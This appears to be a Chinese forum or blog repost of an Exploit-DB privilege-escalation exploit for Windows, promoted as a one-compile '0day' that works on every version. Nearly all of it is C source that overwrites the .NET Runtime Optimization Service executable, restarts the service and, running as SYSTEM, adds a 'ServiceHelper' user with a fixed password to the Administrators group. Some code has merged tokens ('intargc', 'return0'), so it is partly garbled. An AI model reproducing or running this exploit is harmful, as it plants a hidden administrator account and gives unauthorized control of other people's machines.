.net最新提权0day,通杀windows

ps：这个可以一次编译成功，不用改啦……来自：

http://www.exploit-db.com/exploits/16940/

exploit-db比较厚道的，不在编译上难为小菜啦……

/* 

# Exploit Title: .NET Runtime Optimization Service Privilege Escalation 

# Date: 03-07-2011 

# Author: XenoMuta <xenomuta@tuxfamily.org> 

# Version: v2.0.50727 

# Tested on: Windows XP (sp3), 2003 R2, 7 

# CVE : n/a 

    _  __                 __  ___      __ 

   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _ 

   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ 

  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / 

 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/ 

 xenomuta [at] tuxfamily.org 

 xenomuta [at] gmail.com 

 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg 

 This one's a no-brainer, plain simple: 

 This service's EXE file can be overwritten by any non-admin domain user 

 and local power users ( wich are the default permissions set ). 

 This exploit compiles to a service that uses the original service's id. 

 Tested on Windows 2003, WinXP (sp3) and Win7  

 ( my guess is that it runs on any win box running this service ). 

 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!! 

 bless y'all! 

*/ 

#include <stdio.h> 

#include <windows.h> 

SERVICE_STATUS          ServiceStatus; 

SERVICE_STATUS_HANDLE   hStatus; 

#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe" 

#define PWN_SHORT   "mscorsvw.exe" 

#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86" 

#define PWN_ID      "clr_optimization_v2.0.50727_32" 

void  ServiceMain(intargc, char** argv) { 

    if(InitService()) { 

       ServiceStatus.dwCurrentState = SERVICE_STOPPED; 

       ServiceStatus.dwWin32ExitCode = -1; 

       SetServiceStatus(hStatus, &ServiceStatus); 

       return; 

    } 

   ServiceStatus.dwCurrentState = SERVICE_RUNNING; 

   SetServiceStatus (hStatus, &ServiceStatus); 

} 

voidControlHandler(DWORDrequest); 

intInitService(); 

intmain(intargc, char**argv) { 

    characUserName[100]; 

    DWORDnUserName = sizeof(acUserName); 

    GetUserName(acUserName, &nUserName); 

    if(strcmp((char*)&acUserName, "SYSTEM")) { 

        char*str = (char*)malloc(2048); 

        memset(str, 0, 2048); 

        snprintf(str, 2048, "%s.bak", PWN_EXE); 

        if(rename(PWN_EXE, str) != 0) { 

           fprintf(stderr, " :(  sorry, can't write to file.\n"); 

           exit(1); 

        } 

        CopyFile(argv[0], PWN_EXE, !0); 

        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME); 

        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n"); 

        system(str); 

    } 

    SERVICE_TABLE_ENTRY ServiceTable[2]; 

ServiceTable[0].lpServiceName = PWN_ID; 

    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; 

    ServiceTable[1].lpServiceName = NULL; 

    ServiceTable[1].lpServiceProc = NULL; 

    StartServiceCtrlDispatcher(ServiceTable); 

    return0; 

} 

intInitService() { 

    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add"); 

}